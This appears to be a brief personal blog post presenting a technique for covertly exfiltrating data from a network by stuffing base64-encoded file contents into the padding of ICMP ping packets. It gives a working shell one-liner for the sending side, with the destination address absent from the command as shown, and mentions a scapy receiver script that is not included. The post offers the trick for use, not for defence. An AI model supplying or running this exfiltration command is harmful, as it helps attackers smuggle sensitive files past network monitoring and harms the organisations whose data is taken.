Data Exfiltration with Ping

I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. How to exfiltrate data from a network using the padding of ICMP echo request packets.

Sending data

base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i; done

This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

Obviously you should change the IP before sending :)

Receiving data

You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

That's all for now.